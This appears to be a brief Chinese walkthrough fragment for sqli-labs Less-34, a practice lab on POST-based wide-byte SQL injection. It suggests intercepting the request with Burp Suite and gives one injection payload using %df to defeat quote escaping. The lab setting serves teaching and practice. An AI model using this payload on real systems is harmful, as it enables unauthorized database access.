34与33,32不同在于34通过POST方式传递数据
法1:直接使用bp拦截,在拦截中进行数据修改
uname=admin%df' union select 1,2#&passwd=&submit=Submit
Less34【POST方式宽字符注入】

相关文章: